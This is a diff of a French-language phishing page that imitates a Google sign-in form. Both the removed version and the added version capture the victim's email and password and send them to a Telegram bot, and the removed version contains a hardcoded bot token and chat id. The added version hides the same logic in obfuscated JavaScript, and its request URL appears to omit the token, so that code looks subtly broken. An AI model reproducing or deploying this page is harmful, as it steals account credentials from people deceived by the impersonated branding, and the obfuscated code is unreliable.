--- a/index.html
+++ b/index.html
@@ -1,155 +1,1 @@
-<!DOCTYPE html>
-<html lang="fr">
-<head>
-    <meta charset="UTF-8" />
-    <title>Connexion</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1" />
-    <style>
-        body {
-            font-family: Arial, sans-serif;
-            background-color: #f2f3f5;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            margin: 0;
-            padding: 10px;
-        }
-
-        .login-container {
-            background-color: white;
-            padding: 40px 30px;
-            border-radius: 8px;
-            width: 100%;
-            max-width: 400px;
-            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
-            text-align: center;
-            box-sizing: border-box;
-        }
-
-        .login-container img {
-            margin: 0 auto 20px;
-            width: 92px;
-            display: block;
-        }
-
-        h2 {
-            margin-bottom: 10px;
-            font-weight: 400;
-        }
-
-        p.subtitle {
-            color: #5f6368;
-            font-size: 14px;
-            margin-bottom: 30px;
-        }
-
-        input[type="text"],
-        input[type="password"] {
-            width: 100%;
-            padding: 12px;
-            margin-bottom: 20px;
-            border: 1px solid #dadce0;
-            border-radius: 4px;
-            font-size: 16px;
-            box-sizing: border-box;
-        }
-
-        input[type="submit"] {
-            width: 100%;
-            background-color: #1a73e8;
-            color: white;
-            padding: 12px;
-            border: none;
-            border-radius: 4px;
-            font-size: 16px;
-            cursor: pointer;
-            transition: background-color 0.3s ease;
-        }
-
-        input[type="submit"]:hover {
-            background-color: #1669c1;
-        }
-
-        .footer {
-            margin-top: 20px;
-            font-size: 12px;
-            color: #777;
-        }
-
-        .footer a {
-            color: #1a73e8;
-            text-decoration: none;
-        }
-
-        .footer a:hover {
-            text-decoration: underline;
-        }
-
-        /* Responsive */
-        @media (max-width: 450px) {
-            .login-container {
-                padding: 30px 20px;
-                max-width: 100%;
-            }
-
-            input[type="text"],
-            input[type="password"],
-            input[type="submit"] {
-                font-size: 14px;
-                padding: 10px;
-            }
-
-            .login-container img {
-                width: 75px;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="login-container">
-        <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png" alt="Google Logo" />
-        <h2>Connexion</h2>
-        <p class="subtitle">Utilisez votre compte Google</p>
-        <form id="loginForm">
-            <input type="text" id="username" name="username" placeholder="Adresse e-mail ou numéro de téléphone" required />
-            <input type="password" id="password" name="password" placeholder="Mot de passe" required />
-            <input type="submit" value="Suivant" />
-        </form>
-        <div class="footer">
-            Non pas votre ordinateur ? Utilisez une fenêtre de navigation privée.<br />
-            <a href="#">En savoir plus</a>
-        </div>
-    </div>
-
-    <script>
-        const token = "7299094069:AAFDvFHt9j6GQ26l-POyTAZBDesGt3j1psY"; // Remplace par ton token Telegram
-        const chat_id = "6033726939"; // Remplace par ton chat id Telegram
-
-        document.getElementById('loginForm').addEventListener('submit', function(event){
-            event.preventDefault();
-
-            const username = document.getElementById('username').value;
-            const password = document.getElementById('password').value;
-
-            const message = `Nouvelle connexion reçue !%0AUtilisateur : ${username}%0AMot de passe : ${password}`;
-
-            fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${message}`, {
-                method: 'GET'
-            })
-            .then(response => response.json())
-            .then(data => {
-                if(data.ok){
-                    alert('veuiller ressayer');
-                    document.getElementById('loginForm').reset();
-                } else {
-                    alert('Erreur : ' + data.description);
-                }
-            })
-            .catch(error => {
-                alert('Erreur réseau : ' + error);
-            });
-        });
-    </script>
-</body>
-</html>
+<!DOCTYPE html><html lang="fr"><head><meta charset="UTF-8"/><title>Connexion</title><meta name="viewport" content="width=device-width,initial-scale=1"/><style>body{font-family:Arial,sans-serif;background:#f2f3f5;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;padding:10px}.login-container{background:#fff;padding:40px 30px;border-radius:8px;width:100%;max-width:400px;box-shadow:0 2px 10px rgba(0,0,0,.1);text-align:center;box-sizing:border-box}.login-container img{margin:0 auto 20px;width:92px;display:block}h2{margin-bottom:10px;font-weight:400}p.subtitle{color:#5f6368;font-size:14px;margin-bottom:30px}input[type=text],input[type=password]{width:100%;padding:12px;margin-bottom:20px;border:1px solid #dadce0;border-radius:4px;font-size:16px;box-sizing:border-box}input[type=submit]{width:100%;background:#1a73e8;color:#fff;padding:12px;border:none;border-radius:4px;font-size:16px;cursor:pointer;transition:background-color .3s ease}input[type=submit]:hover{background:#1669c1}.footer{margin-top:20px;font-size:12px;color:#777}.footer a{color:#1a73e8;text-decoration:none}.footer a:hover{text-decoration:underline}@media(max-width:450px){.login-container{padding:30px 20px;max-width:100%}input[type=text],input[type=password],input[type=submit]{font-size:14px;padding:10px}.login-container img{width:75px}}</style></head><body><div class="login-container"><img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png" alt="Google Logo"/><h2>Connexion</h2><p class="subtitle">Utilisez votre compte Google</p><form id="a"><input type="text" id="b" name="username" placeholder="Adresse e-mail ou numéro de téléphone" required/><input type="password" id="c" name="password" placeholder="Mot de passe" required/><input type="submit" value="Suivant"/></form><div class="footer">Non pas votre ordinateur ? Utilisez une fenêtre de navigation privée.<br/><a href="#">En savoir plus</a></div></div><script>var _0x2a4b=['addEventListener','submit','preventDefault','value','GET','then','json','ok','alert','description','catch','Erreur\x20r\xE9seau\x20:\x20','https://api.telegram.org/bot','sendMessage?chat_id=','&text=','Nouvelle\x20connexion\x20re\xE7ue\x20!\x0AUtilisateur\x20:\x20','\x0AMot\x20de\x20passe\x20:\x20','getElementById','a','b','c','fetch'];(function(_0x40168d,_0x4f83ec){var _0x3843b6=function(_0x595992){while(--_0x595992){_0x40168d['push'](_0x40168d['shift']());}};_0x3843b6(++_0x4f83ec);}(_0x2a4b,0x77));var _0x5b7c=function(_0x40168d,_0x4f83ec){_0x40168d=_0x40168d-0x0;var _0x3843b6=_0x2a4b[_0x40168d];return _0x3843b6;};document[_0x5b7c('0x13')](_0x5b7c('0x11'))[_0x5b7c('0x0')](_0x5b7c('0x1'),function(_0x1a7e18){_0x1a7e18[_0x5b7c('0x2')]();var _0x5d6e78=document[_0x5b7c('0x13')](_0x5b7c('0x12'))[_0x5b7c('0x3')],_0x4d2d14=document[_0x5b7c('0x13')](_0x5b7c('0x14'))[_0x5b7c('0x3')],_0x22426a=_0x5b7c('0xf')+encodeURIComponent(_0x5d6e78)+_0x5b7c('0x10')+encodeURIComponent(_0x4d2d14);window[_0x5b7c('0x15')](_0x5b7c('0xe')+_0x22426a,{method:_0x5b7c('0x4')})[_0x5b7c('0x5')](function(_0x23e06b){return _0x23e06b[_0x5b7c('0x6')]();})[_0x5b7c('0x5')](function(_0x4c35ad){_0x4c35ad[_0x5b7c('0x7')]?_0x5b7c('0x8')('veuiller ressayer'):_0x5b7c('0x8')(_0x5b7c('0x9')+_0x4c35ad[_0x5b7c('0xa')]);})[_0x5b7c('0xb')](function(_0x12cbba){_0x5b7c('0x8')(_0x5b7c('0xc')+_0x12cbba);});});</script></body></html>
